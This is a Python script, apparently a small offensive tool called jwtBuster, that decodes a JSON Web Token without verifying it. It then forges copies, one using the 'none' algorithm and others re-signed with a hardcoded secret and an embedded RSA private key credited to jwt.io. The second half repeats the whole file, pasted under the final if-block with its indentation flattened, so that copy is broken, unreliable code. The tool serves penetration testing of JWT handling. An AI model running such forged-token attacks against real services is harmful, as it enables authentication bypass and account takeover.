Anon-Exploiter/jwtBuster.py

## jwtBuster.py
from sys import argv

import json
import jwt


JWTSECRET 	= "jwtSecretKeyEncryption"
PRIVATEKEY 	= """-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAnzyis1ZjfNB0bBgKFMSvvkTtwlvBsaJq7S5wA+kzeVOVpVWw
kWdVha4s38XM/pa/yr47av7+z3VTmvDRyAHcaT92whREFpLv9cj5lTeJSibyr/Mr
m/YtjCZVWgaOYIhwrXwKLqPr/11inWsAkfIytvHWTxZYEcXLgAXFuUuaS3uF9gEi
NQwzGTU1v0FqkqTBr4B8nW3HCN47XUu0t8Y0e+lf4s4OxQawWD79J9/5d3Ry0vbV
3Am1FtGJiJvOwRsIfVChDpYStTcHTCMqtvWbV6L11BWkpzGXSW4Hv43qa+GSYOD2
QU68Mb59oSk2OB+BtOLpJofmbGEGgvmwyCI9MwIDAQABAoIBACiARq2wkltjtcjs
kFvZ7w1JAORHbEufEO1Eu27zOIlqbgyAcAl7q+/1bip4Z/x1IVES84/yTaM8p0go
amMhvgry/mS8vNi1BN2SAZEnb/7xSxbflb70bX9RHLJqKnp5GZe2jexw+wyXlwaM
+bclUCrh9e1ltH7IvUrRrQnFJfh+is1fRon9Co9Li0GwoN0x0byrrngU8Ak3Y6D9
D8GjQA4Elm94ST3izJv8iCOLSDBmzsPsXfcCUZfmTfZ5DbUDMbMxRnSo3nQeoKGC
0Lj9FkWcfmLcpGlSXTO+Ww1L7EGq+PT3NtRae1FZPwjddQ1/4V905kyQFLamAA5Y
lSpE2wkCgYEAy1OPLQcZt4NQnQzPz2SBJqQN2P5u3vXl+zNVKP8w4eBv0vWuJJF+
hkGNnSxXQrTkvDOIUddSKOzHHgSg4nY6K02ecyT0PPm/UZvtRpWrnBjcEVtHEJNp
bU9pLD5iZ0J9sbzPU/LxPmuAP2Bs8JmTn6aFRspFrP7W0s1Nmk2jsm0CgYEAyH0X
+jpoqxj4efZfkUrg5GbSEhf+dZglf0tTOA5bVg8IYwtmNk/pniLG/zI7c+GlTc9B
BwfMr59EzBq/eFMI7+LgXaVUsM/sS4Ry+yeK6SJx/otIMWtDfqxsLD8CPMCRvecC
2Pip4uSgrl0MOebl9XKp57GoaUWRWRHqwV4Y6h8CgYAZhI4mh4qZtnhKjY4TKDjx
QYufXSdLAi9v3FxmvchDwOgn4L+PRVdMwDNms2bsL0m5uPn104EzM6w1vzz1zwKz
5pTpPI0OjgWN13Tq8+PKvm/4Ga2MjgOgPWQkslulO/oMcXbPwWC3hcRdr9tcQtn9
Imf9n2spL/6EDFId+Hp/7QKBgAqlWdiXsWckdE1Fn91/NGHsc8syKvjjk1onDcw0
NvVi5vcba9oGdElJX3e9mxqUKMrw7msJJv1MX8LWyMQC5L6YNYHDfbPF1q5L4i8j
8mRex97UVokJQRRA452V2vCO6S5ETgpnad36de3MUxHgCOX3qL382Qx9/THVmbma
3YfRAoGAUxL/Eu5yvMK8SAt/dJK6FedngcM3JEFNplmtLYVLWhkIlNRGDwkg3I5K
y18Ae9n7dHVueyslrb6weq7dTkYDi3iOYRW8HRkIQh06wEdbxt0shTzAJvvCQfrB
jg/3747WSsf/zBTcHihTRBdAv6OmdhV4/dD5YBfLAkLrd+mX7iE=
-----END RSA PRIVATE KEY-----""" 	# Key taken from jwt.io


"""
ToDos
	- Read some articles and find other ways to encode/encrypt/test the token

ToDos Done
	- Print the JWT
	- Print the decoded JWT
	- Find the Type of Encryption/Encoding being done in the Token
	- `Encode` the JWT token with None type
	- Find the encoding/encryption mechanism and encrypt the token specific to that
	- Encrypt the JWT token with HS128
	- Encrypt the JWT token with HS256
	- Encrypt the JWT token with RS256
	- Encrypt the JWT token with RS512

Member:
	- Do try other encryption types' tokens too, don't just use the same type always! (hooman specific)
"""


def printData(heading, data):
	print("-" * 30)
	print(f"[#] {heading}")
	print("-" * 30)
	print(data)
	print("-" * 30)
	print()


def decodeJWT(token):
	decodedToken 	= json.dumps(jwt.decode(token, verify=False), indent=4)
	printData('Decoded JWT Data', decodedToken)
	return(decodedToken)


def JWTHeader(token):
	jwtHeader 		= jwt.get_unverified_header(token)
	printData("JWT Header", jwtHeader)
	return(jwtHeader['alg'], jwtHeader)


def encodeWithNONE(decodedJWT):
	decodedToken 	= json.loads(decodedJWT)
	tokenWithNONE 	= jwt.encode(decodedToken, key='', algorithm=None).decode()
	printData("JWT encoded token with type `None`", tokenWithNONE)


def jwtEncodingEncryption(algo, body):
	if algo == 'HS256':
		encryptedToken 	= jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS256').decode()

	elif algo == 'HS384':
		encryptedToken 	= jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS384').decode()

	elif algo == 'HS512':
		encryptedToken 	= jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS512').decode()

	elif algo == 'RS256':
		encryptedToken 	= jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS256').decode()

	elif algo == 'RS384':
		encryptedToken 	= jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS384').decode()

	elif algo == 'RS512':
		encryptedToken 	= jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS512').decode()

	else:
		encryptedToken 	= "[!] This token doesn't has any module currently, please file a issue against this! :)"

	printData(f"JWT encoded token with type `{algo}`", f"{encryptedToken}")


def main():
	jwtToken 	= argv[1]
	printData('JWT Token', jwtToken)

	JWTheaders 	= JWTHeader(jwtToken)
	decodedJWT 	= decodeJWT(jwtToken)

	encodeWithNONE(decodedJWT)
	jwtEncodingEncryption(JWTheaders[0], decodedJWT)


if __name__ == '__main__':
	main()
	from sys import argv

	import json
	import jwt


	JWTSECRET = "jwtSecretKeyEncryption"
	PRIVATEKEY = """-----BEGIN RSA PRIVATE KEY-----
	MIIEogIBAAKCAQEAnzyis1ZjfNB0bBgKFMSvvkTtwlvBsaJq7S5wA+kzeVOVpVWw
	kWdVha4s38XM/pa/yr47av7+z3VTmvDRyAHcaT92whREFpLv9cj5lTeJSibyr/Mr
	m/YtjCZVWgaOYIhwrXwKLqPr/11inWsAkfIytvHWTxZYEcXLgAXFuUuaS3uF9gEi
	NQwzGTU1v0FqkqTBr4B8nW3HCN47XUu0t8Y0e+lf4s4OxQawWD79J9/5d3Ry0vbV
	3Am1FtGJiJvOwRsIfVChDpYStTcHTCMqtvWbV6L11BWkpzGXSW4Hv43qa+GSYOD2
	QU68Mb59oSk2OB+BtOLpJofmbGEGgvmwyCI9MwIDAQABAoIBACiARq2wkltjtcjs
	kFvZ7w1JAORHbEufEO1Eu27zOIlqbgyAcAl7q+/1bip4Z/x1IVES84/yTaM8p0go
	amMhvgry/mS8vNi1BN2SAZEnb/7xSxbflb70bX9RHLJqKnp5GZe2jexw+wyXlwaM
	+bclUCrh9e1ltH7IvUrRrQnFJfh+is1fRon9Co9Li0GwoN0x0byrrngU8Ak3Y6D9
	D8GjQA4Elm94ST3izJv8iCOLSDBmzsPsXfcCUZfmTfZ5DbUDMbMxRnSo3nQeoKGC
	0Lj9FkWcfmLcpGlSXTO+Ww1L7EGq+PT3NtRae1FZPwjddQ1/4V905kyQFLamAA5Y
	lSpE2wkCgYEAy1OPLQcZt4NQnQzPz2SBJqQN2P5u3vXl+zNVKP8w4eBv0vWuJJF+
	hkGNnSxXQrTkvDOIUddSKOzHHgSg4nY6K02ecyT0PPm/UZvtRpWrnBjcEVtHEJNp
	bU9pLD5iZ0J9sbzPU/LxPmuAP2Bs8JmTn6aFRspFrP7W0s1Nmk2jsm0CgYEAyH0X
	+jpoqxj4efZfkUrg5GbSEhf+dZglf0tTOA5bVg8IYwtmNk/pniLG/zI7c+GlTc9B
	BwfMr59EzBq/eFMI7+LgXaVUsM/sS4Ry+yeK6SJx/otIMWtDfqxsLD8CPMCRvecC
	2Pip4uSgrl0MOebl9XKp57GoaUWRWRHqwV4Y6h8CgYAZhI4mh4qZtnhKjY4TKDjx
	QYufXSdLAi9v3FxmvchDwOgn4L+PRVdMwDNms2bsL0m5uPn104EzM6w1vzz1zwKz
	5pTpPI0OjgWN13Tq8+PKvm/4Ga2MjgOgPWQkslulO/oMcXbPwWC3hcRdr9tcQtn9
	Imf9n2spL/6EDFId+Hp/7QKBgAqlWdiXsWckdE1Fn91/NGHsc8syKvjjk1onDcw0
	NvVi5vcba9oGdElJX3e9mxqUKMrw7msJJv1MX8LWyMQC5L6YNYHDfbPF1q5L4i8j
	8mRex97UVokJQRRA452V2vCO6S5ETgpnad36de3MUxHgCOX3qL382Qx9/THVmbma
	3YfRAoGAUxL/Eu5yvMK8SAt/dJK6FedngcM3JEFNplmtLYVLWhkIlNRGDwkg3I5K
	y18Ae9n7dHVueyslrb6weq7dTkYDi3iOYRW8HRkIQh06wEdbxt0shTzAJvvCQfrB
	jg/3747WSsf/zBTcHihTRBdAv6OmdhV4/dD5YBfLAkLrd+mX7iE=
	-----END RSA PRIVATE KEY-----""" # Key taken from jwt.io


	"""
	ToDos
	- Read some articles and find other ways to encode/encrypt/test the token

	ToDos Done
	- Print the JWT
	- Print the decoded JWT
	- Find the Type of Encryption/Encoding being done in the Token
	- `Encode` the JWT token with None type
	- Find the encoding/encryption mechanism and encrypt the token specific to that
	- Encrypt the JWT token with HS128
	- Encrypt the JWT token with HS256
	- Encrypt the JWT token with RS256
	- Encrypt the JWT token with RS512

	Member:
	- Do try other encryption types' tokens too, don't just use the same type always! (hooman specific)
	"""


	def printData(heading, data):
	print("-" * 30)
	print(f"[#] {heading}")
	print("-" * 30)
	print(data)
	print("-" * 30)
	print()


	def decodeJWT(token):
	decodedToken = json.dumps(jwt.decode(token, verify=False), indent=4)
	printData('Decoded JWT Data', decodedToken)
	return(decodedToken)


	def JWTHeader(token):
	jwtHeader = jwt.get_unverified_header(token)
	printData("JWT Header", jwtHeader)
	return(jwtHeader['alg'], jwtHeader)


	def encodeWithNONE(decodedJWT):
	decodedToken = json.loads(decodedJWT)
	tokenWithNONE = jwt.encode(decodedToken, key='', algorithm=None).decode()
	printData("JWT encoded token with type `None`", tokenWithNONE)


	def jwtEncodingEncryption(algo, body):
	if algo == 'HS256':
	encryptedToken = jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS256').decode()

	elif algo == 'HS384':
	encryptedToken = jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS384').decode()

	elif algo == 'HS512':
	encryptedToken = jwt.encode(json.loads(body), key=JWTSECRET, algorithm='HS512').decode()

	elif algo == 'RS256':
	encryptedToken = jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS256').decode()

	elif algo == 'RS384':
	encryptedToken = jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS384').decode()

	elif algo == 'RS512':
	encryptedToken = jwt.encode(json.loads(body), PRIVATEKEY, algorithm='RS512').decode()

	else:
	encryptedToken = "[!] This token doesn't has any module currently, please file a issue against this! :)"

	printData(f"JWT encoded token with type `{algo}`", f"{encryptedToken}")


	def main():
	jwtToken = argv[1]
	printData('JWT Token', jwtToken)

	JWTheaders = JWTHeader(jwtToken)
	decodedJWT = decodeJWT(jwtToken)

	encodeWithNONE(decodedJWT)
	jwtEncodingEncryption(JWTheaders[0], decodedJWT)


	if __name__ == '__main__':
	main()